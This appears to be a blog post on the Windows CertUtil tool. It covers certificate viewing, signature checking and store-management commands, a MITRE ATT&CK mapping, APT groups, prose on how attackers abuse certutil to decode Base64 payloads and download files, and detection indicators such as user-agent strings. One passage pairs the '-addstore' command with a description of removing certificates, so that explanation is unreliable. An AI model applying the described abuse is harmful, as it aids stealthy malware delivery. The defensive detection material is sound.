Unlocking the Power of Certutil

CertUtil is a command-line tool available on Windows operating systems that allows users to manage certificates and certificate revocation lists (CRLs). It is a powerful tool that enables administrators to perform various tasks, including viewing certificates, verifying digital signatures, and managing certificate stores.

In this blog, we’ll take a closer look at CertUtil and explore its features and functionalities.

Viewing Certificates

One of the primary functions of CertUtil is to view certificates. You can use the tool to view the details of a specific certificate or a list of all certificates in a certificate store. To view a specific certificate, you can use the following command:

certutil -view -restrict "SerialNumber=<serialnumber>"

In the above command, replace <serialnumber> with the serial number of the certificate you want to view. This command will display the details of the specified certificate, including the certificate's subject, issuer, and expiration date.

To view all certificates in a certificate store, you can use the following command:

certutil -store <storename>

In the above command, replace <storename> with the name of the certificate store you want to view, such as My or Root. This command will display a list of all certificates in the specified store.

Verifying Digital Signatures

Another important feature of CertUtil is its ability to verify digital signatures. You can use the tool to verify the digital signature of a file or to verify the digital signature of a certificate. To verify the digital signature of a file, you can use the following command:

certutil -verify <filename>

In the above command, replace <filename> with the name of the file you want to verify. This command will display the result of the verification process, indicating whether the digital signature is valid or invalid.

To verify the digital signature of a certificate, you can use the following command:

certutil -verify -urlfetch <certfilename>

In the above command, replace <certfilename> with the name of the certificate file you want to verify. This command will verify the digital signature of the specified certificate and will also check the certificate's revocation status.

Managing Certificate Stores

CertUtil also allows users to manage certificate stores. You can use the tool to add or remove certificates from a certificate store or to export a certificate to a file. To add a certificate to a store, you can use the following command:

certutil -addstore <storename> <filename>

In the above command, replace <storename> with the name of the store you want to remove the certificate from, and replace <serialnumber> with the serial number of the certificate you want to remove.

Finally, to export a certificate to a file, you can use the following command:

certutil -export <storename> <serialnumber> <filename>

In the above command, replace <storename> with the name of the store that contains the certificate, replace <serialnumber> with the serial number of the certificate you want to export, and replace <filename> with the name of the file you want to export the certificate to.

Certutil defined in MITRE ATT&CK:

• T1130 —  Enterprise — Install Root Certificate
• T1140 —  Defense Evasion — Deobfuscate/Decode Files or Information
• T1105 —  Lateral Movement — Remote File Copy
• S0160 —  certutil

APT Groups That Use Certutil Software:

• G0075 — Rancor
• G0045 — menuPass
• G0007 — APT28
• G0049 — OilRig
• G0010 — Turla

How attackers uses certutil.exe:

According to Malwarebyte report in a attack against Saudi Arabia Government, The payload was embedded in a macro as Base64 code. It uses the certutil program to decode the Base64 into a PE file. The ‘Retefe Trojan’ writes the root certificate to the disk and then uses the above given commands to install it on the system. Certutil.exe used to download and decode remote files. Sofacy has used Certutil to attack multiple government entities. Attackers also can use CertUtil to encode or decode malicious payloads while avoiding detection.

FireEye Threat research report: CertUtil Qualms: They Came to Drop FOMBs

Detection of Certutil attack:

• Certutil.exe creates new files on disk.
• Keep monitoring user agent Microsoft-CryptoAPI/10.0
• Monitoring useragent CertUtil URL Agent.
• Monitoring the process creation for Certutil.exe.

Conclusion

CertUtil is a very powerful tool that allows administrators to manage certificates and certificate stores on Windows operating systems. It provides a range of features and functionalities, including the ability to view certificates, verify digital signatures, and manage.